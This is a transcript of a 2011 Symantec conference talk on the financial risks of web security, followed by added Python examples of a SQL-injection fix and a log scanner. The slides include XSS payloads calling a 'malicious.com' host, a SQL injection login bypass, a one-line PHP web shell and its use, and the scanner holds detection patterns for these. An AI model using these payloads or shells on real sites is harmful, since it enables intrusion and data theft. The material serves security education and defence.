Financial Risks to Internet Security

Martin Lee CISSP CEng and Dr. Les Pritchard CITP discuss the Costs and Financial Risks of Web Security at Symantec Vision 2011


Published in: Technology


Transcript

  • 1. Costs and Financial Risks of Web Security
    Martin Lee CISSP CEng, Dr. Les Pritchard CITP
    SR B03 - Costs and Financial Risks of Web Security 1
  • 2. Where the Threats Come From.
    Insider threats: mostly accidental data deletion.
    Acts of God: fire, flood, volcanos!
    Malicious outsiders (cybercriminals): malware, banking trojans.
    SR B03 - Costs and Financial Risks of Web Security, SYMANTEC VISION 2011, 2
  • 3. How the Bad Guys Make Money
  • 4. Anyone’s Computer or Your Computer?
    Botnets (compromising any computer): denial of service attacks, send spam, steal data.
    Banking trojans (compromising any computer): internet bank robbery.
    Targeted attacks (compromising specific systems): stealing high value data.
  • 5. Making Money From Botnets – Sending Spam
    Traffic analysis of rogue website: 26 days, 350 million spams, 28 sales. But, when scaled up: ~$7000 in sales per day, ~$2M per year.
    Source: C. Kanich et al. “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”, Nov 2008 (http://www.icsi.berkeley.edu/pubs/networking/2008-ccs-spamalytics.pdf)
  • 6. Making Money From Botnets – Denial of Service
    Can hit 100Gb/sec attack traffic. Estimated UK losses $3bn/yr.
  • 7. Making Money From Banking Trojans
    Source: http://www.wired.com/threatlevel/2010/10/zeus-ukraine-arrests/
  • 8. Banking Trojans – Zeus Man-in-Browser Attack
    Malware waits for log in to internet banking, issues payments on your behalf to money mules.
  • 9. Banking Trojans – Zeus Man-in-Browser Attack
    Malware intercepts data sent from bank, removes its transfers, adjusts balance, shows you what you expect to see.
  • 10. Distributing Web Malware – Gumblar Lifecycle
    Uploading web malware to your website by stealing your login details.
    [Diagram labels: HACKER steals login, adds XSS exploit to WEBSITE; EXPLOIT HOST controls exploit and forwards XSS MALWARE; unaffected VICTIM visits website, malware installs.]
  • 11. Malware on Legitimate Domains
    [Chart: malicious domains lifecycle, % remaining active over time (0 to 180 days), “Old” domains vs “New” domains.]
    Over time more than 80% of malicious domains are “Old” domains.
  • 12. Employee Browsing Habits
  • 13. Browsing Habits Outside of the Office
    [Chart: % of web blocks (0 to 100) against % of users (0 to 100), Mobile vs Office.]
  • 14. Distributing Web Malware – Advertising Services
    Subvert a legitimate website.
    [Diagram: web page adverts sold by sales team to an advertiser, sold by a reseller to an advertiser, resold further to a malware distributor.]
  • 15. Fake AV
  • 16. Fake AV
    Do the maths: 1 million products sold @ $39.95, minus $8.2 million fine = $31.75 million profit!
    Source: http://www.pcworld.com/businesscenter/article/217987/alleged_scareware_vendors_to_pay_82_million_to_ftc.html
  • 17. Attacking Your Website
  • 18. My Website – XSS Example
    www.example.com/index.php?page=cat&category=1&PHPSESSID=
  • 19. My Website – XSS Example
    Attack JS: "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
    URL encode it, replace ‘category’ value:
    www.example.com/index.php?page=cat&category=1&PHPSESSID=
    becomes
    www.example.com/index.php?page=cat&category=%3E%0A%3C%53%43%52%49
  • 20. My Website – XSS Example
    Attacker can execute whatever they like:
    Exploit: <script src="http://www.malicious.com/attack.js">
    Redirect: window.location.href = "http://www.malicious.com/"
    Why not?: document.product.price = "0.01"
  • 21. XSS Example – Click that link
    Email containing link. Embed link in discussion page.
    [Diagram: web page with ENTER TEXT field and SUBMIT button.]
    I agree. <img src="/images/smiley.gif" onload="document.location='http://malicious/'">
  • 22. SQL Injection – “Little Bobby Tables”
    Source: XKCD Comic - http://xkcd.com/327/
  • 23. My Website – SQL Injection Example
    SQL injection:
      Select * from users where username = "$input" and password=md5($password);
      $input = 'admin"; -- '
      Select * from users where username = "admin"; -- ... ignored
  • 24. My Website – SQL Injection Example
    How about a file like this?
      <? system($_REQUEST['cmd']); ?>
  • 25. My Website – Now completely at mercy of attacker
    http://www.example.com/images/shell.php?cmd=%6C%73%20%2D%6C
    ls -l -> %6C%73%20%2D%6C
      total 36
      -rw-rw-r-- 1 martin martin  191 Nov 27  2003 categories.php
      drwxrwxr-x 2 martin martin 4096 Mar 16 17:53 inc
      -rw-rw-r-- 1 martin martin  543 Mar 29 14:54 index.old
      -rw-r--r-- 1 martin martin  124 Mar 29 15:03 index.php
      -rw-rw-r-- 1 martin martin  537 Mar 29 14:41 index.php~
      -rw-rw-r-- 1 martin martin 2068 Mar 29 16:20 product_image.php
      -rw-rw-r-- 1 martin martin 1924 Nov 28  2003 product_image.php~
      -rw-rw-r-- 1 martin martin  189 Nov 27  2003 products.php
      -rw-r--r-- 1 martin martin   31 Mar 29 15:04 shell.php
  • 26. Vulnerable Websites
    Skilled attackers can easily find vulnerabilities. Others can use a list of vulnerable websites.
  • 27. How You Lose Money
  • 28. Data Breach Losses
    Ponemon Institute & Symantec Research:
      – Average cost per data breach $7.2 million.
      – $214 per breached record.
      – 31% of breaches are malicious or criminal attack.
      – Malicious attacks cost more: $318 per breached record.
    See: http://www.symantec.com/about/news/release/article.jsp?prid=20110308_01
    Calculate your risk: http://databreachcalculator.com/
  • 29. Symantec SMB Survey – What do SMBs suffer?
    [Chart, 0% to 60%: Environment downtime; Corporate data theft; Customer or employee PI theft; Customer financial information theft; Intellectual property theft.]
  • 30. Protecting Yourself.
  • 31. Know Your Assets, Know Attack Vectors
  • 32. Layers of Protection Provide Maximum Detection
  • 33. Test & Monitor Your Web Services
    Find & fix vulnerabilities in your web services. Monitor logs to identify attacks, block attacker. You don’t need to be perfect, just better than your competitors.
  • 34. Thank you!
    Martin Lee, Martin_lee@symantec.com, +44 1452 627 042
    Copyright © 2011 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
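The login query from slide 23, built by string interpolation, beside the parameterised form that closes the hole. This is an added Python/sqlite3 example, not code from the presentation; it uses single-quoted SQL string literals (so the injected input is admin'; -- rather than the slide's admin"; -- ), substitutes sha256 for the slide's md5 purely to mirror the query shape, and the users table and password are constructed sample data.

```python
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table with one account (sample data, not from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # The slide compares against md5($password); sha256 stands in here to mirror that shape.
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.sha256(b"correct horse").hexdigest()))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Query built by string interpolation, the shape shown on slide 23."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{pw_hash}'")
    # With username "admin'; -- " the quote closes the literal and "--" turns the
    # password check into a comment, so the row comes back without a valid password.
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the driver binds the input as data, never as SQL."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, pw_hash)).fetchone()
```
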
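Slide 33's advice to monitor logs and block the attacker, applied to the request shapes from slides 19 and 25 (an encoded script tag in a query parameter, and a cmd= parameter on a PHP file). This is an added Python example, not from the presentation; the log lines, client IPs, timestamps and sizes are constructed, and the check is a simple signature match on the percent-decoded query string, a starting point rather than a full web application firewall.

```python
import re
from typing import List, Optional, Set, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (combined log format). IPs, timestamps and sizes are
# made up; the XSS and cmd= request shapes follow slides 19 and 25.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Mar/2011:15:03:11 +0100] "GET /index.php?page=cat&category=1 HTTP/1.1" 200 1240
203.0.113.9 - - [29/Mar/2011:15:03:40 +0100] "GET /index.php?page=cat&category=%22%3E%3CSCRIPT%3Ealert(1)%3C/SCRIPT%3E HTTP/1.1" 200 1311
203.0.113.9 - - [29/Mar/2011:15:04:02 +0100] "GET /images/shell.php?cmd=%6C%73%20%2D%6C HTTP/1.1" 200 812
203.0.113.7 - - [29/Mar/2011:15:05:17 +0100] "GET /products.php?id=3 HTTP/1.1" 200 990
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
XSS_RE = re.compile(r"<\s*script|\bon\w+\s*=", re.IGNORECASE)


def classify(target: str) -> Optional[Tuple[str, str]]:
    """Return (alert type, decoded evidence) for a request target, or None if benign."""
    parts = urlsplit(target)
    # parse_qsl percent-decodes once; unquote again so double-encoded payloads are seen too
    params = [(k, unquote(v)) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    for key, value in params:
        if XSS_RE.search(value):
            return ("xss", f"{key}={value}")
    if parts.path.endswith(".php"):
        for key, value in params:
            if key == "cmd":  # a cmd= parameter on a PHP script: the slide 24 web shell
                return ("webshell", f"{parts.path} cmd={value}")
    return None


def scan(log_text: str) -> List[Tuple[str, str, str]]:
    """Scan log lines and return (client IP, alert type, evidence) for each hit."""
    alerts = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed line: skip it rather than abort the scan
        hit = classify(match["target"])
        if hit:
            alerts.append((match["ip"], hit[0], hit[1]))
    return alerts


def offenders(alerts: List[Tuple[str, str, str]]) -> Set[str]:
    """Distinct client IPs to block or investigate (slide 33: monitor logs, block attacker)."""
    return {ip for ip, _, _ in alerts}


if __name__ == "__main__":
    for ip, kind, evidence in scan(SAMPLE_LOG):
        print(f"{ip:15} {kind:9} {evidence}")
```
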